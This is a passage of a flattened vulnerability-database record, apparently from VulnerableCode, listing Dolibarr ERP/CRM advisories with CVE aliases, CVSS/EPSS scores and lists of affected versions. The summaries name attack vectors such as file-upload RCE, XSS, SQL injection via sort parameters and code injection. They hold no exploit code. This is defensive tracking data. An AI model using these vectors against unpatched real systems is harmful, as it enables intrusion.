| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0 |
|
|
| aliases |
CVE-2021-25954, GHSA-vxhc-c4qm-647p
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-651j-rw3n-kkgu |
|
| 13 |
| url |
VCID-6drz-jsq4-wyhd |
| vulnerability_id |
VCID-6drz-jsq4-wyhd |
| summary |
Dolibarr arbitrary file upload vulnerability
An arbitrary file upload vulnerability in the Upload Template function of Dolibarr ERP CRM up to v19.0.1 allows attackers to execute arbitrary code via uploading a crafted .SQL file. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
8.7 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 3 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
8.7 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2024-37821, GHSA-p7r8-7w87-8g46
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-6drz-jsq4-wyhd |
|
| 14 |
| url |
VCID-6nme-3afj-qfdp |
| vulnerability_id |
VCID-6nme-3afj-qfdp |
| summary |
Cross-site Scripting
In the editor module of the Dolibarr editor scripts are executed in a victim’s browser when they open the page containing the vulnerable field. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The injected scripts can extract the Session ID, which can lead to full Account takeover of the admin and due to other vulnerability (Improper Access Control on Private notes) a low privileged user can update the private notes which could lead to privilege escalation. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25955 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00415 |
| scoring_system |
epss |
| scoring_elements |
0.61992 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00415 |
| scoring_system |
epss |
| scoring_elements |
0.62036 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00415 |
| scoring_system |
epss |
| scoring_elements |
0.62047 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00415 |
| scoring_system |
epss |
| scoring_elements |
0.6204 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25955 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 9 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 10 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 11 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 12 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 13 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 14 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 15 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 16 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 17 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 18 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 19 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 20 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 21 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 22 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 23 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 24 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 25 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 26 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 27 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 28 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 29 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 30 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 31 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 32 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 33 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0 |
|
|
| aliases |
CVE-2021-25955, GHSA-cpv8-6xgr-rmf6
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-6nme-3afj-qfdp |
|
| 15 |
| url |
VCID-6ten-mcds-gbd7 |
| vulnerability_id |
VCID-6ten-mcds-gbd7 |
| summary |
Cross-site Scripting
Dolibarr ERP/CRM allows XSS because uploaded HTML documents are served as text/html despite being renamed to `.noexe` files. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19210 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00606 |
| scoring_system |
epss |
| scoring_elements |
0.70039 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00606 |
| scoring_system |
epss |
| scoring_elements |
0.70071 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00606 |
| scoring_system |
epss |
| scoring_elements |
0.70088 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00606 |
| scoring_system |
epss |
| scoring_elements |
0.7008 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19210 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-9fes-esxc-s7gw |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 27 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 28 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 29 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 30 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 31 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 32 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 33 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 34 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 35 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 36 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 37 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 38 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 39 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 40 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 41 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 42 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 43 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 44 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3 |
|
|
| aliases |
CVE-2019-19210, GHSA-87r3-4gc8-f897
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-6ten-mcds-gbd7 |
|
| 16 |
| url |
VCID-79xt-u5af-cqey |
| vulnerability_id |
VCID-79xt-u5af-cqey |
| summary |
Incorrect Authorization
`core/get_menudiv.php` in Dolibarr allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-12669 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00289 |
| scoring_system |
epss |
| scoring_elements |
0.5257 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00289 |
| scoring_system |
epss |
| scoring_elements |
0.52619 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00289 |
| scoring_system |
epss |
| scoring_elements |
0.52637 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00289 |
| scoring_system |
epss |
| scoring_elements |
0.5263 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-12669 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-1xw6-g5jg-9bhq |
|
| 3 |
| vulnerability |
VCID-2avs-48u9-5kgf |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 6 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 7 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 8 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 9 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 10 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-m588-hqxv-tkgw |
|
| 26 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 27 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 28 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 29 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 30 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 31 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 32 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 33 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 34 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 35 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 36 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 37 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 38 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 39 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@12.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@12.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 9 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 10 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 11 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 12 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 13 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 14 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 15 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 16 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 17 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 18 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 19 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 20 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 21 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 22 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 23 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 24 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 25 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 26 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 27 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 28 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 29 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 30 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 31 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 32 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 33 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 34 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 35 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 36 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@12.0.0 |
|
|
| aliases |
CVE-2020-12669, GHSA-rg8m-84jf-9367
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-79xt-u5af-cqey |
|
| 17 |
| url |
VCID-7ku4-fwqc-33ba |
| vulnerability_id |
VCID-7ku4-fwqc-33ba |
| summary |
Dolibarr vulnerable to RCE via the computed field parameter
Dolibarr ERP & CRM v21.0.1 were discovered to contain a remote code execution (RCE) vulnerability in the User module configuration via the computed field parameter. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
| reference_url |
https://github.com/PhDg1410/Research |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/ |
|
|
| url |
https://github.com/PhDg1410/Research |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
|
| aliases |
CVE-2025-56588, GHSA-27hj-48r9-x2vx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7ku4-fwqc-33ba |
|
| 18 |
| url |
VCID-7kz1-s7qf-aqan |
| vulnerability_id |
VCID-7kz1-s7qf-aqan |
| summary |
Dolibarr vulnerable to SQL Injection
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters sortorder y sortfield in /dolibarr/admin/dict.php. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2 |
|
|
| aliases |
CVE-2024-5314, GHSA-c3h9-q3jx-w7fc
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7kz1-s7qf-aqan |
|
| 19 |
| url |
VCID-7qjh-teat-tqav |
| vulnerability_id |
VCID-7qjh-teat-tqav |
| summary |
Code injection in dolibarr/dolibarr
Code Injection in GitHub repository dolibarr/dolibarr prior to 15.0.1. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0819 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.01735 |
| scoring_system |
epss |
| scoring_elements |
0.82813 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.01735 |
| scoring_system |
epss |
| scoring_elements |
0.82835 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.01735 |
| scoring_system |
epss |
| scoring_elements |
